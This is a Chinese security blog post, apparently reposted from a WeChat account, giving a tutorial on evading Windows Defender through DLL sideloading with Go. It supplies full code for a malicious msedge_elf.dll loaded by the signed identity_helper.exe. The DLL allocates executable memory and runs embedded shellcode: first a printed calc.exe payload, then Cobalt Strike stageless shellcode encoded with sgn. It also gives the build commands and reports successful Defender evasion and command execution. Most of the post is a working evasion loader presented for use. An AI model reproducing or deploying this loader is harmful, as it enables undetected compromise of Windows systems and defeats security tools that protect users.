2.mingw64
下载地址
https://sourceforge.net/projects/mingw-w64/files/
注意: sjlj 版本支持32位和64位编译,seh 版本仅支持64位程序编译; posix 版本封装一层,并没有直接调用windows API,而 win32 版本直接调用了windows API,性能更好, 对于跨平台编译的话我建议选择 posix-sjlj 版本,这样可以很方便编译dl和so文件,缺点是文件稍微大一些,编译速度慢一些. 我这里选择的是(x86_64-posix-sjlj), 下载后之后把解压目录下的bin加入到环境变量中
设置go
set CGO_ENABLED=1
main.go
package mainimport "C"//export Addfunc Add(a, b int) int {return a + b}func main() {}
//export Add: 定义导出函数
必须要有main函数
编译dll命令
go build -ldflags="-w -s" -buildmode=c-shared -o dll1.dll main.go
编写exe测试
main.go
package mainimport ("fmt""syscall")func main() {handle := syscall.MustLoadDLL("dll1.dll")Add := handle.MustFindProc("Add")res, _, _ := Add.Call(2, 3)fmt.Println(res)}
成功调用dll文件中的导出函数
使用 identity_helper.exe 白程序测试
main.go
package mainimport "C"import ("golang.org/x/sys/windows""syscall""unsafe")//export GetInstallDetailsPayloadfunc GetInstallDetailsPayload() int {handle := windows.NewLazySystemDLL("kernel32.dll")VirtualAlloc := handle.NewProc("VirtualAlloc")RtlMoveMemory := handle.NewProc("RtlMoveMemory")// 运行计算器shellcodesc := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)return 0}//export SignalInitializeCrashReportingfunc SignalInitializeCrashReporting() int {return 0}func main() {}
编译dll命令
go build -ldflags="-w -s" -buildmode=c-shared -o msedge_elf.dll main.go
替换成cs的shellcode, cs的无阶段的shellcode使用sgn进行处理
package mainimport "C"import ("golang.org/x/sys/windows""syscall""unsafe")//export GetInstallDetailsPayloadfunc GetInstallDetailsPayload() int {sc := []byte{0xe8,0x2b,0x00...} // cs的无阶段的shellcode使用sgn进行处理handle := windows.NewLazySystemDLL("kernel32.dll")VirtualAlloc := handle.NewProc("VirtualAlloc")RtlMoveMemory := handle.NewProc("RtlMoveMemory")addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sc)), 0x1000|0x2000, 0x40)RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)))syscall.SyscallN(addr)return 0}//export SignalInitializeCrashReportingfunc SignalInitializeCrashReporting() int {return 0}func main() {}
编译
go build -ldflags="-w -s" -buildmode=c-shared -o msedge_elf.dll main.go使用defender查杀测试, 免杀defender
上线cs
执行系统命令, 动态免杀defender
成功免杀defender
原文始发于微信公众号(Sec探索者):【免杀】go语言实现白加黑免杀defender
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论